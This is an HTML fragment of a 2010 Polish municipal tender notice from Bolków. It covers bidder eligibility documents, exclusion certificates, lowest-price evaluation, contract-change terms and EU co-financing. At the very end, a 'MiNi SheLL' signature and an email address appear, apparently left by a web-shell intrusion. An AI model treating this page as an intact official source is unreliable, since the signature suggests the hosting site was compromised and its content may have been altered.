W tym celu Wykonawca dostarczy:
a)	Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na wartość min. 50 tys. PLN, wystawioną nie wcześniej niż  3 miesiące przed upływem terminu składania ofert. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia dokument ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku;
b)	Opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia dokument ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje możliwość zmian w postanowieniach umowy w następujących sytuacjach: 
1) braku lub wady opisu przedmiotu zamówienia;
2) zmian w opisie przedmiotu zamówienia;
3) zmian w harmonogramie prac;
4) zmian dotyczących płatności  i odbiorów; 
5) zmiany stawki VAT;
6) wystąpienia siły wyższej;
7) zmiany w obowiązujących przepisach;
8) prolongaty terminu zapłaty za wykonanie zamówienia w sytuacji gdy zamówienie zostało zrealizowane w przewidzianych pierwotnie terminach - po uzyskaniu  zgody Wykonawcy; 
9) zmiany przedmiotu zamówienia, jeżeli jest to na korzyść zamawiającego i zaszły okoliczności których nie można było przewidzieć w chwili zawarcia umowy, a zmiana umowy będzie realizowana w ramach dotychczasowego wynagrodzenia;
10) personelu wskazanego przez Wykonawcę do realizacji zamówienia;
11) personelu wskazanego przez Zamawiającego;
12) w przypadku wykonywania zamówienia przy udziale Podwykonawców zmiany Podwykonawców, którzy realizować będą  zamówienie; 
Zmiana umowy wymaga formy pisemnej, zatwierdzonej przez obie strony umowy, w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://umbolkow.bip.net.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bolkowie, 59-420 Bolków ul. Rynek 1, pok. Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 09:00, miejsce: Urząd Miejski w Bolkowie, 59-420 Bolków ul. Rynek 1, pok. Nr 9 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków UE, Priorytet 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (turystyka kulturowa) Działanie 6.4 Turystyka kulturowa Regionalnego Programu Operacyjnego dla województwa dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com